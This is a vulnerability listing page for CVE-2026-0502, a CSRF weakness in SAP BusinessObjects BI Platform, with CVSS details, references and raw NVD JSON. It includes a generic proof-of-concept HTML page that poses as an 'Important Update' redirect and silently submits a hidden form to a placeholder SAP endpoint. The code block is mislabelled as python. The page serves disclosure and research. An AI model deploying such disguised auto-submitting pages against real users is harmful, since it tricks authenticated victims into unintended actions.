CVE-2026-0502

Description

Due to insufficient CSRF protection in SAP BusinessObjects Business Intelligence Platform ,an authenticated user could be tricked by an attacker to send unintended requests to the web server. This has low impact on integrity and availability of the application. There is no impact on confidentiality of the data.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SAP BusinessObjects Business Intelligence Platform (具体受影响版本请参考SAP Security Patch Day和Note 3667593)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
  Proof of Concept (PoC) for CVE-2026-0502
  This HTML page demonstrates how an attacker could craft a malicious request.
  The victim must be authenticated to the SAP BusinessObjects platform.
-->
<!DOCTYPE html>
<html>
<head>
    <title>Important Update</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; padding: 50px; }
        .hidden { display: none; }
    </style>
</head>
<body>
    <h2>Please wait while we redirect you...</h2>
    
    <!-- The form targets a vulnerable endpoint on the SAP server -->
    <form id="csrf_form" action="http://target-sap-server:8080/platform/vulnerable_action" method="POST">
        <!-- 
           These parameters represent the unintended requests an attacker wants to send.
           Actual parameter names would depend on the specific vulnerable endpoint.
        -->
        <input type="hidden" name="user_setting" value="malicious_value">
        <input type="hidden" name="confirm_action" value="true">
    </form>

    <script>
        // Automatically submit the form when the page loads
        document.addEventListener('DOMContentLoaded', function() {
            document.getElementById('csrf_form').submit();
        });
    </script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0502
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0502
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0502/
[4] VulDB https://vuldb.com/cve/CVE-2026-0502
[5] https://me.sap.com/notes/3667593
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0502", "sourceIdentifier": "[email protected]", "published": "2026-05-12T03:16:10.480", "lastModified": "2026-05-12T03:16:10.480", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to insufficient CSRF protection in SAP BusinessObjects Business Intelligence Platform ,an authenticated user could be tricked by an attacker to send unintended requests to the web server. This has low impact on integrity and availability of the application. There is no impact on confidentiality of the data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://me.sap.com/notes/3667593", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}